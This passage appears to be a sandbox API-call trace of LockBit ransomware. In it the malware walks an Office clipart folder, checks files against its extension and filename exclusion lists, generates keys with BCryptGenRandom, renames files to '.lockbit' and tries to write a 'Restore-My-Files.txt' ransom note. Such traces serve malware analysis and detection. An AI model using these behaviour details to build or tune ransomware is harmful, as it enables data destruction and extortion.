Office\\CLIPART\\PUB60COR\\DD00414_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.242] malloc (_Size=0xa6) returned 0x77d800 [0110.242] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.244] free (_Block=0x77d800) [0110.244] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.244] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.244] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.244] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4ecd00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xba4ecd00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00419_.WMF", cAlternateFileName="")) returned 1 [0110.244] lstrcmpiW (lpString1=".", lpString2="DD00419_.WMF") returned -1 [0110.244] lstrcmpiW (lpString1="..", lpString2="DD00419_.WMF") returned -1 [0110.244] PathFindExtensionW (pszPath="DD00419_.WMF") returned=".WMF" [0110.244] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.244] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.245] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.245] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00419_.WMF") returned 1 [0110.246] lstrcmpiW (lpString1="ntldr", lpString2="DD00419_.WMF") returned 1 [0110.246] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00419_.WMF") returned 1 [0110.246] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00419_.WMF") returned -1 [0110.246] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00419_.WMF") returned -1 [0110.246] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00419_.WMF") returned 1 [0110.246] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00419_.WMF") returned 1 [0110.246] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.246] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned=".WMF" [0110.246] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.246] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.246] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.247] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.248] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.248] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.248] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.lockbit") returned 72 [0110.248] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00419_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0110.248] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.248] malloc (_Size=0x40068) returned 0x3e70008 [0110.248] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=712) returned 1 [0110.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0110.249] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.250] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0110.250] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0110.251] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.252] malloc (_Size=0xa6) returned 0x77d800 [0110.252] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.254] free (_Block=0x77d800) [0110.254] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.254] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.254] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.254] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91da000, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb91da000, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x78c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00437_.WMF", cAlternateFileName="")) returned 1 [0110.254] lstrcmpiW (lpString1=".", lpString2="DD00437_.WMF") returned -1 [0110.254] lstrcmpiW (lpString1="..", lpString2="DD00437_.WMF") returned -1 [0110.254] PathFindExtensionW (pszPath="DD00437_.WMF") returned=".WMF" [0110.254] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.254] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.255] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.255] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.256] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00437_.WMF") returned 1 [0110.256] lstrcmpiW (lpString1="ntldr", lpString2="DD00437_.WMF") returned 1 [0110.256] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00437_.WMF") returned 1 [0110.256] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00437_.WMF") returned -1 [0110.256] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00437_.WMF") returned -1 [0110.256] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00437_.WMF") returned 1 [0110.256] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00437_.WMF") returned 1 [0110.256] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.256] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned=".WMF" [0110.257] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.257] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.257] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.258] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.258] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.258] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.258] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.258] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.258] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.258] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.258] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.258] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.lockbit") returned 72 [0110.258] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0110.259] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.259] malloc (_Size=0x40068) returned 0x3ef0008 [0110.259] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1932) returned 1 [0110.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0110.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.260] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0110.260] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0110.265] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.265] malloc (_Size=0xa6) returned 0x77d800 [0110.265] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.266] free (_Block=0x77d800) [0110.266] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.266] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.266] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.266] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00448_.WMF", cAlternateFileName="")) returned 1 [0110.266] lstrcmpiW (lpString1=".", lpString2="DD00448_.WMF") returned -1 [0110.266] lstrcmpiW (lpString1="..", lpString2="DD00448_.WMF") returned -1 [0110.266] PathFindExtensionW (pszPath="DD00448_.WMF") returned=".WMF" [0110.266] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.266] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.267] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.267] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.268] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00448_.WMF") returned 1 [0110.268] lstrcmpiW (lpString1="ntldr", lpString2="DD00448_.WMF") returned 1 [0110.268] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00448_.WMF") returned 1 [0110.268] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00448_.WMF") returned -1 [0110.268] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00448_.WMF") returned -1 [0110.268] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00448_.WMF") returned 1 [0110.268] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00448_.WMF") returned 1 [0110.268] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.268] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned=".WMF" 